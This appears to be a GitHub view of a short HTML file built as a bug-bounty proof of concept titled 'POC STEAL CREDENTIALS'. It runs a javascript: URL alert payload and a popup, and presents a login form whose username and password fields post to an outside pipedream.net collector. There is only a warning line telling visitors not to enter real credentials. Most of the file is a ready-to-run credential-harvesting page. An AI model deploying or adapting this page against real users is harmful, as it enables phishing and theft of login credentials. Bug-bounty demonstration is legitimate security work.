-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
50 lines (41 loc) · 1.18 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
+*
<!DOCTYPE html>
<html>
<body>
<center>
<style>
.warning {
color: red;
}
</style>
<h1> POC STEAL CREDENTIALS </h1>
<br>
<br>
<br>
<script>
var popup = window.open(
'https://www.example.com',
'NombreDelPopup',
'width=600,height=400,scrollbars=yes,resizable=yes'
);
window.location.href = "javascript:alert('THEOKEEN+XSS+SLYFER')";
</script>
<br>
<p>This page is made to show a POC test for BugBounty. <span class="warning">Do not enter your official credentials.</span></p>
<center><form action="https://eo55p1jx1f3g537.m.pipedream.net" method="post">
<div>
<label for="username">User:</label>
<input type="text" id="username" name="username">
</div>
<div>
<label for="name">Password:</label>
<input type="text" id="name" name="name">
</div>
<div>
<button type="submit">SEND</button>
</div>
<br>
<p> <span class="warning">THEOKEEN - SLYFER</span></p>
</form></center>
</body>
</html>